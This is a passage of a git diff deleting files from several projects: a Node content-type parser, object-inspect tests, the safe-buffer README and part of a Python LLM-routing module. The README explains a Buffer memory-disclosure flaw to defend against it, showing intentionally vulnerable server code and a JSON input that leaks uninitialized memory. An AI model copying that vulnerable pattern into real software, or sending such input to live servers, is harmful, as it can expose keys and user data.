/ "^" / "_" / "`" / "|" / "~" - * / DIGIT / ALPHA - * ; any VCHAR, except delimiters - * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE - * qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text - * obs-text = %x80-FF - * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ) - */ -var PARAM_REGEXP = /; *([!#$%&'*+.^_`|~0-9A-Za-z-]+) *= *("(?:[\u000b\u0020\u0021\u0023-\u005b\u005d-\u007e\u0080-\u00ff]|\\[\u000b\u0020-\u00ff])*"|[!#$%&'*+.^_`|~0-9A-Za-z-]+) */g // eslint-disable-line no-control-regex -var TEXT_REGEXP = /^[\u000b\u0020-\u007e\u0080-\u00ff]+$/ // eslint-disable-line no-control-regex -var TOKEN_REGEXP = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+$/ - -/** - * RegExp to match quoted-pair in RFC 7230 sec 3.2.6 - * - * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ) - * obs-text = %x80-FF - */ -var QESC_REGEXP = /\\([\u000b\u0020-\u00ff])/g // eslint-disable-line no-control-regex - -/** - * RegExp to match chars that must be quoted-pair in RFC 7230 sec 3.2.6 - */ -var QUOTE_REGEXP = /([\\"])/g - -/** - * RegExp to match type in RFC 7231 sec 3.1.1.1 - * - * media-type = type "/" subtype - * type = token - * subtype = token - */ -var TYPE_REGEXP = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+\/[!#$%&'*+.^_`|~0-9A-Za-z-]+$/ - -/** - * Module exports. - * @public - */ - -exports.format = format -exports.parse = parse - -/** - * Format object to media type. 
- * - * @param {object} obj - * @return {string} - * @public - */ - -function format (obj) { - if (!obj || typeof obj !== 'object') { - throw new TypeError('argument obj is required') - } - - var parameters = obj.parameters - var type = obj.type - - if (!type || !TYPE_REGEXP.test(type)) { - throw new TypeError('invalid type') - } - - var string = type - - // append parameters - if (parameters && typeof parameters === 'object') { - var param - var params = Object.keys(parameters).sort() - - for (var i = 0; i < params.length; i++) { - param = params[i] - - if (!TOKEN_REGEXP.test(param)) { - throw new TypeError('invalid parameter name') - } - - string += '; ' + param + '=' + qstring(parameters[param]) - } - } - - return string -} - -/** - * Parse media type to object. - * - * @param {string|object} string - * @return {Object} - * @public - */ - -function parse (string) { - if (!string) { - throw new TypeError('argument string is required') - } - - // support req/res-like objects as argument - var header = typeof string === 'object' - ? getcontenttype(string) - : string - - if (typeof header !== 'string') { - throw new TypeError('argument string is required to be a string') - } - - var index = header.indexOf(';') - var type = index !== -1 - ? 
header.slice(0, index).trim() - : header.trim() - - if (!TYPE_REGEXP.test(type)) { - throw new TypeError('invalid media type') - } - - var obj = new ContentType(type.toLowerCase()) - - // parse parameters - if (index !== -1) { - var key - var match - var value - - PARAM_REGEXP.lastIndex = index - - while ((match = PARAM_REGEXP.exec(header))) { - if (match.index !== index) { - throw new TypeError('invalid parameter format') - } - - index += match[0].length - key = match[1].toLowerCase() - value = match[2] - - if (value.charCodeAt(0) === 0x22 /* " */) { - // remove quotes - value = value.slice(1, -1) - - // remove escapes - if (value.indexOf('\\') !== -1) { - value = value.replace(QESC_REGEXP, '$1') - } - } - - obj.parameters[key] = value - } - - if (index !== header.length) { - throw new TypeError('invalid parameter format') - } - } - - return obj -} - -/** - * Get content-type from req/res objects. - * - * @param {object} - * @return {Object} - * @private - */ - -function getcontenttype (obj) { - var header - - if (typeof obj.getHeader === 'function') { - // res-like - header = obj.getHeader('content-type') - } else if (typeof obj.headers === 'object') { - // req-like - header = obj.headers && obj.headers['content-type'] - } - - if (typeof header !== 'string') { - throw new TypeError('content-type header is missing from object') - } - - return header -} - -/** - * Quote a string if necessary. - * - * @param {string} val - * @return {string} - * @private - */ - -function qstring (val) { - var str = String(val) - - // no need to quote tokens - if (TOKEN_REGEXP.test(str)) { - return str - } - - if (str.length > 0 && !TEXT_REGEXP.test(str)) { - throw new TypeError('invalid parameter value') - } - - return '"' + str.replace(QUOTE_REGEXP, '\\$1') + '"' -} - -/** - * Class to represent a content type. 
- * @private - */ -function ContentType (type) { - this.parameters = Object.create(null) - this.type = type -} diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/fn.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/fn.js deleted file mode 100644 index de3ca625e73adcabc8570a11318504d8d6aa6806..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/fn.js +++ /dev/null @@ -1,76 +0,0 @@ -var inspect = require('../'); -var test = require('tape'); -var arrow = require('make-arrow-function')(); -var functionsHaveConfigurableNames = require('functions-have-names').functionsHaveConfigurableNames(); - -test('function', function (t) { - t.plan(1); - var obj = [1, 2, function f(n) { return n; }, 4]; - t.equal(inspect(obj), '[ 1, 2, [Function: f], 4 ]'); -}); - -test('function name', function (t) { - t.plan(1); - var f = (function () { - return function () {}; - }()); - f.toString = function toStr() { return 'function xxx () {}'; }; - var obj = [1, 2, f, 4]; - t.equal(inspect(obj), '[ 1, 2, [Function (anonymous)] { toString: [Function: toStr] }, 4 ]'); -}); - -test('anon function', function (t) { - var f = (function () { - return function () {}; - }()); - var obj = [1, 2, f, 4]; - t.equal(inspect(obj), '[ 1, 2, [Function (anonymous)], 4 ]'); - - t.end(); -}); - -test('arrow function', { skip: !arrow }, function (t) { - t.equal(inspect(arrow), '[Function (anonymous)]'); - - t.end(); -}); - -test('truly nameless function', { skip: !arrow || !functionsHaveConfigurableNames }, function (t) { - function f() {} - Object.defineProperty(f, 'name', { value: false }); - t.equal(f.name, false); - t.equal( - inspect(f), - '[Function: f]', - 'named function with falsy `.name` does not hide its original name' - ); - - function g() {} - Object.defineProperty(g, 'name', { value: true }); - t.equal(g.name, true); - t.equal( - inspect(g), - '[Function: 
true]', - 'named function with truthy `.name` hides its original name' - ); - - var anon = function () {}; // eslint-disable-line func-style - Object.defineProperty(anon, 'name', { value: null }); - t.equal(anon.name, null); - t.equal( - inspect(anon), - '[Function (anonymous)]', - 'anon function with falsy `.name` does not hide its anonymity' - ); - - var anon2 = function () {}; // eslint-disable-line func-style - Object.defineProperty(anon2, 'name', { value: 1 }); - t.equal(anon2.name, 1); - t.equal( - inspect(anon2), - '[Function: 1]', - 'anon function with truthy `.name` hides its anonymity' - ); - - t.end(); -}); diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/safe-buffer/README.md b/spaces/fffiloni/controlnet-animation-doodle/node_modules/safe-buffer/README.md deleted file mode 100644 index e9a81afd0406f030ba21169f0c7a1dba70b3a93b..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/safe-buffer/README.md +++ /dev/null @@ -1,584 +0,0 @@ -# safe-buffer [![travis][travis-image]][travis-url] [![npm][npm-image]][npm-url] [![downloads][downloads-image]][downloads-url] [![javascript style guide][standard-image]][standard-url] - -[travis-image]: https://img.shields.io/travis/feross/safe-buffer/master.svg -[travis-url]: https://travis-ci.org/feross/safe-buffer -[npm-image]: https://img.shields.io/npm/v/safe-buffer.svg -[npm-url]: https://npmjs.org/package/safe-buffer -[downloads-image]: https://img.shields.io/npm/dm/safe-buffer.svg -[downloads-url]: https://npmjs.org/package/safe-buffer -[standard-image]: https://img.shields.io/badge/code_style-standard-brightgreen.svg -[standard-url]: https://standardjs.com - -#### Safer Node.js Buffer API - -**Use the new Node.js Buffer APIs (`Buffer.from`, `Buffer.alloc`, -`Buffer.allocUnsafe`, `Buffer.allocUnsafeSlow`) in all versions of Node.js.** - -**Uses the built-in implementation when available.** - -## install - -``` -npm install safe-buffer -``` - 
-## usage - -The goal of this package is to provide a safe replacement for the node.js `Buffer`. - -It's a drop-in replacement for `Buffer`. You can use it by adding one `require` line to -the top of your node.js modules: - -```js -var Buffer = require('safe-buffer').Buffer - -// Existing buffer code will continue to work without issues: - -new Buffer('hey', 'utf8') -new Buffer([1, 2, 3], 'utf8') -new Buffer(obj) -new Buffer(16) // create an uninitialized buffer (potentially unsafe) - -// But you can use these new explicit APIs to make clear what you want: - -Buffer.from('hey', 'utf8') // convert from many types to a Buffer -Buffer.alloc(16) // create a zero-filled buffer (safe) -Buffer.allocUnsafe(16) // create an uninitialized buffer (potentially unsafe) -``` - -## api - -### Class Method: Buffer.from(array) - - -* `array` {Array} - -Allocates a new `Buffer` using an `array` of octets. - -```js -const buf = Buffer.from([0x62,0x75,0x66,0x66,0x65,0x72]); - // creates a new Buffer containing ASCII bytes - // ['b','u','f','f','e','r'] -``` - -A `TypeError` will be thrown if `array` is not an `Array`. - -### Class Method: Buffer.from(arrayBuffer[, byteOffset[, length]]) - - -* `arrayBuffer` {ArrayBuffer} The `.buffer` property of a `TypedArray` or - a `new ArrayBuffer()` -* `byteOffset` {Number} Default: `0` -* `length` {Number} Default: `arrayBuffer.length - byteOffset` - -When passed a reference to the `.buffer` property of a `TypedArray` instance, -the newly created `Buffer` will share the same allocated memory as the -TypedArray. - -```js -const arr = new Uint16Array(2); -arr[0] = 5000; -arr[1] = 4000; - -const buf = Buffer.from(arr.buffer); // shares the memory with arr; - -console.log(buf); - // Prints: - -// changing the TypedArray changes the Buffer also -arr[1] = 6000; - -console.log(buf); - // Prints: -``` - -The optional `byteOffset` and `length` arguments specify a memory range within -the `arrayBuffer` that will be shared by the `Buffer`. 
- -```js -const ab = new ArrayBuffer(10); -const buf = Buffer.from(ab, 0, 2); -console.log(buf.length); - // Prints: 2 -``` - -A `TypeError` will be thrown if `arrayBuffer` is not an `ArrayBuffer`. - -### Class Method: Buffer.from(buffer) - - -* `buffer` {Buffer} - -Copies the passed `buffer` data onto a new `Buffer` instance. - -```js -const buf1 = Buffer.from('buffer'); -const buf2 = Buffer.from(buf1); - -buf1[0] = 0x61; -console.log(buf1.toString()); - // 'auffer' -console.log(buf2.toString()); - // 'buffer' (copy is not changed) -``` - -A `TypeError` will be thrown if `buffer` is not a `Buffer`. - -### Class Method: Buffer.from(str[, encoding]) - - -* `str` {String} String to encode. -* `encoding` {String} Encoding to use, Default: `'utf8'` - -Creates a new `Buffer` containing the given JavaScript string `str`. If -provided, the `encoding` parameter identifies the character encoding. -If not provided, `encoding` defaults to `'utf8'`. - -```js -const buf1 = Buffer.from('this is a tést'); -console.log(buf1.toString()); - // prints: this is a tést -console.log(buf1.toString('ascii')); - // prints: this is a tC)st - -const buf2 = Buffer.from('7468697320697320612074c3a97374', 'hex'); -console.log(buf2.toString()); - // prints: this is a tést -``` - -A `TypeError` will be thrown if `str` is not a string. - -### Class Method: Buffer.alloc(size[, fill[, encoding]]) - - -* `size` {Number} -* `fill` {Value} Default: `undefined` -* `encoding` {String} Default: `utf8` - -Allocates a new `Buffer` of `size` bytes. If `fill` is `undefined`, the -`Buffer` will be *zero-filled*. - -```js -const buf = Buffer.alloc(5); -console.log(buf); - // -``` - -The `size` must be less than or equal to the value of -`require('buffer').kMaxLength` (on 64-bit architectures, `kMaxLength` is -`(2^31)-1`). Otherwise, a [`RangeError`][] is thrown. A zero-length Buffer will -be created if a `size` less than or equal to 0 is specified. 
- -If `fill` is specified, the allocated `Buffer` will be initialized by calling -`buf.fill(fill)`. See [`buf.fill()`][] for more information. - -```js -const buf = Buffer.alloc(5, 'a'); -console.log(buf); - // -``` - -If both `fill` and `encoding` are specified, the allocated `Buffer` will be -initialized by calling `buf.fill(fill, encoding)`. For example: - -```js -const buf = Buffer.alloc(11, 'aGVsbG8gd29ybGQ=', 'base64'); -console.log(buf); - // -``` - -Calling `Buffer.alloc(size)` can be significantly slower than the alternative -`Buffer.allocUnsafe(size)` but ensures that the newly created `Buffer` instance -contents will *never contain sensitive data*. - -A `TypeError` will be thrown if `size` is not a number. - -### Class Method: Buffer.allocUnsafe(size) - - -* `size` {Number} - -Allocates a new *non-zero-filled* `Buffer` of `size` bytes. The `size` must -be less than or equal to the value of `require('buffer').kMaxLength` (on 64-bit -architectures, `kMaxLength` is `(2^31)-1`). Otherwise, a [`RangeError`][] is -thrown. A zero-length Buffer will be created if a `size` less than or equal to -0 is specified. - -The underlying memory for `Buffer` instances created in this way is *not -initialized*. The contents of the newly created `Buffer` are unknown and -*may contain sensitive data*. Use [`buf.fill(0)`][] to initialize such -`Buffer` instances to zeroes. - -```js -const buf = Buffer.allocUnsafe(5); -console.log(buf); - // - // (octets will be different, every time) -buf.fill(0); -console.log(buf); - // -``` - -A `TypeError` will be thrown if `size` is not a number. - -Note that the `Buffer` module pre-allocates an internal `Buffer` instance of -size `Buffer.poolSize` that is used as a pool for the fast allocation of new -`Buffer` instances created using `Buffer.allocUnsafe(size)` (and the deprecated -`new Buffer(size)` constructor) only when `size` is less than or equal to -`Buffer.poolSize >> 1` (floor of `Buffer.poolSize` divided by two). 
The default -value of `Buffer.poolSize` is `8192` but can be modified. - -Use of this pre-allocated internal memory pool is a key difference between -calling `Buffer.alloc(size, fill)` vs. `Buffer.allocUnsafe(size).fill(fill)`. -Specifically, `Buffer.alloc(size, fill)` will *never* use the internal Buffer -pool, while `Buffer.allocUnsafe(size).fill(fill)` *will* use the internal -Buffer pool if `size` is less than or equal to half `Buffer.poolSize`. The -difference is subtle but can be important when an application requires the -additional performance that `Buffer.allocUnsafe(size)` provides. - -### Class Method: Buffer.allocUnsafeSlow(size) - - -* `size` {Number} - -Allocates a new *non-zero-filled* and non-pooled `Buffer` of `size` bytes. The -`size` must be less than or equal to the value of -`require('buffer').kMaxLength` (on 64-bit architectures, `kMaxLength` is -`(2^31)-1`). Otherwise, a [`RangeError`][] is thrown. A zero-length Buffer will -be created if a `size` less than or equal to 0 is specified. - -The underlying memory for `Buffer` instances created in this way is *not -initialized*. The contents of the newly created `Buffer` are unknown and -*may contain sensitive data*. Use [`buf.fill(0)`][] to initialize such -`Buffer` instances to zeroes. - -When using `Buffer.allocUnsafe()` to allocate new `Buffer` instances, -allocations under 4KB are, by default, sliced from a single pre-allocated -`Buffer`. This allows applications to avoid the garbage collection overhead of -creating many individually allocated Buffers. This approach improves both -performance and memory usage by eliminating the need to track and cleanup as -many `Persistent` objects. - -However, in the case where a developer may need to retain a small chunk of -memory from a pool for an indeterminate amount of time, it may be appropriate -to create an un-pooled Buffer instance using `Buffer.allocUnsafeSlow()` then -copy out the relevant bits. 
- -```js -// need to keep around a few small chunks of memory -const store = []; - -socket.on('readable', () => { - const data = socket.read(); - // allocate for retained data - const sb = Buffer.allocUnsafeSlow(10); - // copy the data into the new allocation - data.copy(sb, 0, 0, 10); - store.push(sb); -}); -``` - -Use of `Buffer.allocUnsafeSlow()` should be used only as a last resort *after* -a developer has observed undue memory retention in their applications. - -A `TypeError` will be thrown if `size` is not a number. - -### All the Rest - -The rest of the `Buffer` API is exactly the same as in node.js. -[See the docs](https://nodejs.org/api/buffer.html). - - -## Related links - -- [Node.js issue: Buffer(number) is unsafe](https://github.com/nodejs/node/issues/4660) -- [Node.js Enhancement Proposal: Buffer.from/Buffer.alloc/Buffer.zalloc/Buffer() soft-deprecate](https://github.com/nodejs/node-eps/pull/4) - -## Why is `Buffer` unsafe? - -Today, the node.js `Buffer` constructor is overloaded to handle many different argument -types like `String`, `Array`, `Object`, `TypedArrayView` (`Uint8Array`, etc.), -`ArrayBuffer`, and also `Number`. - -The API is optimized for convenience: you can throw any type at it, and it will try to do -what you want. - -Because the Buffer constructor is so powerful, you often see code like this: - -```js -// Convert UTF-8 strings to hex -function toHex (str) { - return new Buffer(str).toString('hex') -} -``` - -***But what happens if `toHex` is called with a `Number` argument?*** - -### Remote Memory Disclosure - -If an attacker can make your program call the `Buffer` constructor with a `Number` -argument, then they can make it allocate uninitialized memory from the node.js process. -This could potentially disclose TLS private keys, user data, or database passwords. - -When the `Buffer` constructor is passed a `Number` argument, it returns an -**UNINITIALIZED** block of memory of the specified `size`. 
When you create a `Buffer` like -this, you **MUST** overwrite the contents before returning it to the user. - -From the [node.js docs](https://nodejs.org/api/buffer.html#buffer_new_buffer_size): - -> `new Buffer(size)` -> -> - `size` Number -> -> The underlying memory for `Buffer` instances created in this way is not initialized. -> **The contents of a newly created `Buffer` are unknown and could contain sensitive -> data.** Use `buf.fill(0)` to initialize a Buffer to zeroes. - -(Emphasis our own.) - -Whenever the programmer intended to create an uninitialized `Buffer` you often see code -like this: - -```js -var buf = new Buffer(16) - -// Immediately overwrite the uninitialized buffer with data from another buffer -for (var i = 0; i < buf.length; i++) { - buf[i] = otherBuf[i] -} -``` - - -### Would this ever be a problem in real code? - -Yes. It's surprisingly common to forget to check the type of your variables in a -dynamically-typed language like JavaScript. - -Usually the consequences of assuming the wrong type is that your program crashes with an -uncaught exception. But the failure mode for forgetting to check the type of arguments to -the `Buffer` constructor is more catastrophic. - -Here's an example of a vulnerable service that takes a JSON payload and converts it to -hex: - -```js -// Take a JSON payload {str: "some string"} and convert it to hex -var server = http.createServer(function (req, res) { - var data = '' - req.setEncoding('utf8') - req.on('data', function (chunk) { - data += chunk - }) - req.on('end', function () { - var body = JSON.parse(data) - res.end(new Buffer(body.str).toString('hex')) - }) -}) - -server.listen(8080) -``` - -In this example, an http client just has to send: - -```json -{ - "str": 1000 -} -``` - -and it will get back 1,000 bytes of uninitialized memory from the server. - -This is a very serious bug. 
It's similar in severity to the -[the Heartbleed bug](http://heartbleed.com/) that allowed disclosure of OpenSSL process -memory by remote attackers. - - -### Which real-world packages were vulnerable? - -#### [`bittorrent-dht`](https://www.npmjs.com/package/bittorrent-dht) - -[Mathias Buus](https://github.com/mafintosh) and I -([Feross Aboukhadijeh](http://feross.org/)) found this issue in one of our own packages, -[`bittorrent-dht`](https://www.npmjs.com/package/bittorrent-dht). The bug would allow -anyone on the internet to send a series of messages to a user of `bittorrent-dht` and get -them to reveal 20 bytes at a time of uninitialized memory from the node.js process. - -Here's -[the commit](https://github.com/feross/bittorrent-dht/commit/6c7da04025d5633699800a99ec3fbadf70ad35b8) -that fixed it. We released a new fixed version, created a -[Node Security Project disclosure](https://nodesecurity.io/advisories/68), and deprecated all -vulnerable versions on npm so users will get a warning to upgrade to a newer version. - -#### [`ws`](https://www.npmjs.com/package/ws) - -That got us wondering if there were other vulnerable packages. Sure enough, within a short -period of time, we found the same issue in [`ws`](https://www.npmjs.com/package/ws), the -most popular WebSocket implementation in node.js. - -If certain APIs were called with `Number` parameters instead of `String` or `Buffer` as -expected, then uninitialized server memory would be disclosed to the remote peer. - -These were the vulnerable methods: - -```js -socket.send(number) -socket.ping(number) -socket.pong(number) -``` - -Here's a vulnerable socket server with some echo functionality: - -```js -server.on('connection', function (socket) { - socket.on('message', function (message) { - message = JSON.parse(message) - if (message.type === 'echo') { - socket.send(message.data) // send back the user's message - } - }) -}) -``` - -`socket.send(number)` called on the server, will disclose server memory. 
-
-Here's [the release](https://github.com/websockets/ws/releases/tag/1.0.1) where the issue
-was fixed, with a more detailed explanation. Props to
-[Arnout Kazemier](https://github.com/3rd-Eden) for the quick fix. Here's the
-[Node Security Project disclosure](https://nodesecurity.io/advisories/67).
-
-
-### What's the solution?
-
-It's important that node.js offers a fast way to get memory; otherwise, performance-critical
-applications would needlessly get a lot slower.
-
-But we need a better way to *signal our intent* as programmers. **When we want
-uninitialized memory, we should request it explicitly.**
-
-Sensitive functionality should not be packed into a developer-friendly API that loosely
-accepts many different types. This type of API encourages the lazy practice of passing
-variables in without checking the type very carefully.
-
-#### A new API: `Buffer.allocUnsafe(number)`
-
-The functionality of creating buffers with uninitialized memory should be part of another
-API. We propose `Buffer.allocUnsafe(number)`. This way, it's not part of an API that
-frequently gets user input of all sorts of different types passed into it.
-
-```js
-var buf = Buffer.allocUnsafe(16) // careful, uninitialized memory!
-
-// Immediately overwrite the uninitialized buffer with data from another buffer
-for (var i = 0; i < buf.length; i++) {
-  buf[i] = otherBuf[i]
-}
-```
-
-
-### How do we fix node.js core?
-
-We sent [a PR to node.js core](https://github.com/nodejs/node/pull/4514) (merged as
-`semver-major`) which defends against one case:
-
-```js
-var str = 16
-new Buffer(str, 'utf8')
-```
-
-In this situation, it's implied that the programmer intended the first argument to be a
-string, since they passed an encoding as a second argument. Today, node.js will allocate
-uninitialized memory in the case of `new Buffer(number, encoding)`, which is probably not
-what the programmer intended.
- -But this is only a partial solution, since if the programmer does `new Buffer(variable)` -(without an `encoding` parameter) there's no way to know what they intended. If `variable` -is sometimes a number, then uninitialized memory will sometimes be returned. - -### What's the real long-term fix? - -We could deprecate and remove `new Buffer(number)` and use `Buffer.allocUnsafe(number)` when -we need uninitialized memory. But that would break 1000s of packages. - -~~We believe the best solution is to:~~ - -~~1. Change `new Buffer(number)` to return safe, zeroed-out memory~~ - -~~2. Create a new API for creating uninitialized Buffers. We propose: `Buffer.allocUnsafe(number)`~~ - -#### Update - -We now support adding three new APIs: - -- `Buffer.from(value)` - convert from any type to a buffer -- `Buffer.alloc(size)` - create a zero-filled buffer -- `Buffer.allocUnsafe(size)` - create an uninitialized buffer with given size - -This solves the core problem that affected `ws` and `bittorrent-dht` which is -`Buffer(variable)` getting tricked into taking a number argument. - -This way, existing code continues working and the impact on the npm ecosystem will be -minimal. Over time, npm maintainers can migrate performance-critical code to use -`Buffer.allocUnsafe(number)` instead of `new Buffer(number)`. - - -### Conclusion - -We think there's a serious design issue with the `Buffer` API as it exists today. It -promotes insecure software by putting high-risk functionality into a convenient API -with friendly "developer ergonomics". - -This wasn't merely a theoretical exercise because we found the issue in some of the -most popular npm packages. - -Fortunately, there's an easy fix that can be applied today. Use `safe-buffer` in place of -`buffer`. - -```js -var Buffer = require('safe-buffer').Buffer -``` - -Eventually, we hope that node.js core can switch to this new, safer behavior. We believe -the impact on the ecosystem would be minimal since it's not a breaking change. 
-Well-maintained, popular packages would be updated to use `Buffer.alloc` quickly, while
-older, insecure packages would magically become safe from this attack vector.
-
-
-## links
-
-- [Node.js PR: buffer: throw if both length and enc are passed](https://github.com/nodejs/node/pull/4514)
-- [Node Security Project disclosure for `ws`](https://nodesecurity.io/advisories/67)
-- [Node Security Project disclosure for `bittorrent-dht`](https://nodesecurity.io/advisories/68)
-
-
-## credit
-
-The original issues in `bittorrent-dht`
-([disclosure](https://nodesecurity.io/advisories/68)) and
-`ws` ([disclosure](https://nodesecurity.io/advisories/67)) were discovered by
-[Mathias Buus](https://github.com/mafintosh) and
-[Feross Aboukhadijeh](http://feross.org/).
-
-Thanks to [Adam Baldwin](https://github.com/evilpacket) for helping disclose these issues
-and for his work running the [Node Security Project](https://nodesecurity.io/).
-
-Thanks to [John Hiesey](https://github.com/jhiesey) for proofreading this README and
-auditing the code.
-
-
-## license
-
-MIT. Copyright (C) [Feross Aboukhadijeh](http://feross.org)
diff --git a/spaces/fffiloni/video2mmpose/examples/readme.md b/spaces/fffiloni/video2mmpose/examples/readme.md
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/fkhuggingme/gpt-academic/request_llm/bridge_all.py b/spaces/fkhuggingme/gpt-academic/request_llm/bridge_all.py
deleted file mode 100644
index fddc9a756f062b68610737123ea39b6a83698a42..0000000000000000000000000000000000000000
--- a/spaces/fkhuggingme/gpt-academic/request_llm/bridge_all.py
+++ /dev/null
@@ -1,240 +0,0 @@
-
-"""
-    This file mainly contains two functions that form the common interface for all LLMs; they call further down into lower-level LLM models and handle details such as multi-model parallelism
-
-    Function without multithreading capability: used during normal conversation; has complete interactive features; must not be multithreaded
-    1. predict(...)
-
-    Function that can be called from multiple threads: invoked inside function plugins; flexible and concise
-    2. predict_no_ui_long_connection(...)
-"""
-import tiktoken
-from functools import lru_cache
-from concurrent.futures import ThreadPoolExecutor
-from toolbox import get_conf, trimmed_format_exc
-
-from .bridge_chatgpt import predict_no_ui_long_connection as chatgpt_noui
-from .bridge_chatgpt import predict as chatgpt_ui
-
-from .bridge_chatglm import predict_no_ui_long_connection as chatglm_noui
-from .bridge_chatglm import predict as chatglm_ui
-
-from .bridge_newbing import predict_no_ui_long_connection as newbing_noui
-from .bridge_newbing import predict as newbing_ui
-
-# from .bridge_tgui import predict_no_ui_long_connection as tgui_noui
-# from .bridge_tgui import predict as tgui_ui
-
-colors = ['#FF00FF', '#00FFFF', '#FF0000', '#990099', '#009999', '#990044']
-
-class LazyloadTiktoken(object):
-    def __init__(self, model):
-        self.model = model
-
-    @staticmethod
-    @lru_cache(maxsize=128)
-    def get_encoder(model):
-        print('Loading tokenizer; if this is the first run, downloading its parameters may take a moment')
-        tmp = tiktoken.encoding_for_model(model)
-        print('Tokenizer loaded')
-        return tmp
-
-    def encode(self, *args, **kwargs):
-        encoder = self.get_encoder(self.model)
-        return encoder.encode(*args, **kwargs)
-
-    def decode(self, *args, **kwargs):
-        encoder = self.get_encoder(self.model)
-        return encoder.decode(*args, **kwargs)
-
-# Endpoint redirection
-API_URL_REDIRECT, = get_conf("API_URL_REDIRECT")
-openai_endpoint = "https://api.openai.com/v1/chat/completions"
-api2d_endpoint = "https://openai.api2d.net/v1/chat/completions"
-newbing_endpoint = "wss://sydney.bing.com/sydney/ChatHub"
-# Backward compatibility with the old-style config
-try:
-    API_URL, = get_conf("API_URL")
-    if API_URL != "https://api.openai.com/v1/chat/completions":
-        openai_endpoint = API_URL
-        print("Warning: the API_URL config option is deprecated; please switch to the API_URL_REDIRECT config")
-except:
-    pass
-# New-style config
-if openai_endpoint in API_URL_REDIRECT: openai_endpoint = API_URL_REDIRECT[openai_endpoint]
-if api2d_endpoint in API_URL_REDIRECT: api2d_endpoint = API_URL_REDIRECT[api2d_endpoint]
-if newbing_endpoint in API_URL_REDIRECT: newbing_endpoint = API_URL_REDIRECT[newbing_endpoint]
-
-
-# Get tokenizers
-tokenizer_gpt35 = LazyloadTiktoken("gpt-3.5-turbo")
-tokenizer_gpt4 = LazyloadTiktoken("gpt-4")
-get_token_num_gpt35 = lambda txt: len(tokenizer_gpt35.encode(txt, disallowed_special=()))
-get_token_num_gpt4 = lambda txt: len(tokenizer_gpt4.encode(txt, disallowed_special=()))
-
-
-model_info = {
-    # openai
-    "gpt-3.5-turbo": {
-        "fn_with_ui": chatgpt_ui,
-        "fn_without_ui": chatgpt_noui,
-        "endpoint": openai_endpoint,
-        "max_token": 4096,
-        "tokenizer": tokenizer_gpt35,
-        "token_cnt": get_token_num_gpt35,
-    },
-
-    "gpt-4": {
-        "fn_with_ui": chatgpt_ui,
-        "fn_without_ui": chatgpt_noui,
-        "endpoint": openai_endpoint,
-        "max_token": 8192,
-        "tokenizer": tokenizer_gpt4,
-        "token_cnt": get_token_num_gpt4,
-    },
-
-    # api_2d
-    "api2d-gpt-3.5-turbo": {
-        "fn_with_ui": chatgpt_ui,
-        "fn_without_ui": chatgpt_noui,
-        "endpoint": api2d_endpoint,
-        "max_token": 4096,
-        "tokenizer": tokenizer_gpt35,
-        "token_cnt": get_token_num_gpt35,
-    },
-
-    "api2d-gpt-4": {
-        "fn_with_ui": chatgpt_ui,
-        "fn_without_ui": chatgpt_noui,
-        "endpoint": api2d_endpoint,
-        "max_token": 8192,
-        "tokenizer": tokenizer_gpt4,
-        "token_cnt": get_token_num_gpt4,
-    },
-
-    # chatglm
-    "chatglm": {
-        "fn_with_ui": chatglm_ui,
-        "fn_without_ui": chatglm_noui,
-        "endpoint": None,
-        "max_token": 1024,
-        "tokenizer": tokenizer_gpt35,
-        "token_cnt": get_token_num_gpt35,
-    },
-    # newbing
-    "newbing": {
-        "fn_with_ui": newbing_ui,
-        "fn_without_ui": newbing_noui,
-        "endpoint": newbing_endpoint,
-        "max_token": 4096,
-        "tokenizer": tokenizer_gpt35,
-        "token_cnt": get_token_num_gpt35,
-    },
-}
-
-
-def LLM_CATCH_EXCEPTION(f):
-    """
-    Decorator function that displays errors
-    """
-    def decorated(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience):
-        try:
-            return f(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience)
-        except Exception as e:
-            tb_str = '\n```\n' + trimmed_format_exc() + '\n```\n'
-            observe_window[0] = tb_str
-            return tb_str
-    return 
decorated
-
-
-def predict_no_ui_long_connection(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience=False):
-    """
-    Send the query to the LLM and wait for the reply, completed in one go, without showing intermediate output. Internally, streaming is used to keep the connection from being cut off midway.
-    inputs:
-        The input for this query
-    sys_prompt:
-        The silent system prompt
-    llm_kwargs:
-        Internal tuning parameters of the LLM
-    history:
-        The list of previous dialogue turns
-    observe_window = None:
-        Used to pass already-generated output across threads; most of the time this is only for a fancy visual effect and can be left empty. observe_window[0]: observation window. observe_window[1]: watchdog
-    """
-    import threading, time, copy
-
-    model = llm_kwargs['llm_model']
-    n_model = 1
-    if '&' not in model:
-        assert not model.startswith("tgui"), "TGUI does not support the function-plugin implementation"
-
-        # If querying only one large language model:
-        method = model_info[model]["fn_without_ui"]
-        return method(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience)
-    else:
-        # If querying multiple large language models at the same time:
-        executor = ThreadPoolExecutor(max_workers=4)
-        models = model.split('&')
-        n_model = len(models)
-
-        window_len = len(observe_window)
-        assert window_len==3
-        window_mutex = [["", time.time(), ""] for _ in range(n_model)] + [True]
-
-        futures = []
-        for i in range(n_model):
-            model = models[i]
-            method = model_info[model]["fn_without_ui"]
-            llm_kwargs_feedin = copy.deepcopy(llm_kwargs)
-            llm_kwargs_feedin['llm_model'] = model
-            future = executor.submit(LLM_CATCH_EXCEPTION(method), inputs, llm_kwargs_feedin, history, sys_prompt, window_mutex[i], console_slience)
-            futures.append(future)
-
-        def mutex_manager(window_mutex, observe_window):
-            while True:
-                time.sleep(0.25)
-                if not window_mutex[-1]: break
-                # watchdog
-                for i in range(n_model):
-                    window_mutex[i][1] = observe_window[1]
-                # observation window
-                chat_string = []
